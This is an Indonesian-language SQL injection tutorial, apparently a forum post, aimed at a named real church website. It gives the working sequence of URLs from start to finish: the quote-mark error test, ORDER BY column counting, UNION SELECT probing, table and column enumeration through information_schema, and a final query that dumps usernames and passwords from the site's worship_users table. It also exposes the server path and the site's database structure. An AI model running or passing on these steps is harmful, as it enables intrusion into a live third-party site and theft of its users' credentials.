Tutorial SQLi

Target: http://www.jkimiraclecenter.com/artikel.php?artikelid=56

Untuk mengetahui web itu vuln ato gag... kasih aja tanda ' setelah angka idnya....
http://www.jkimiraclecenter.com/artikel.php?artikelid=56' << error error: Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/content/r/g/m/rgministry/html/JKI3/artikel.php on line 22 (errornya beda-beda lho....) langkah selanjutnya... nyari jumlah kolom... http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 1 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 2 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 3 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 4 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 5 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 6 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 7 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 8 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 9 << bisa http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 10 << error... pokoknya coba terus sampe error... web itu error pada "order by 10" berarti jumlah kolomnya ada 9 (terakhir normal) trus selanjutnya... nyari angka ajaib,,,,, http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,3,4,5,6,7,8,9 angkanya di ganti null aja.... << mengacaukan akses database union select 1,2,..... sampai jumlah kolomnya.... Tuh muncul angka ajaibnya,,, 2,7,3 langkah selanjutnya.... nyari table" di database... http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database() tuh,,, munculkan tabel"nya... artikel,chordfiles,devotion,devotion1011,doyouknow,renungan,short_teaching,songs,songs_video,video,video_view_log,web_registration,word_of_wisdom,worship_users selanjutnya... kita intip kolom"nya yang ada di table = worship_users http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x776f72736869705f7573657273 776f72736869705f7573657273 << hexa dari worship_users muncul deh kolom" di tabel worship_users worship_userid,full_name,username,password,level,email,notify_song,notify_chord,notify_lyric next.. kita intip username & password... Cheesy http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,group_concat(username,0x7c,password),4,5,6,7,8,9 from worship_users Source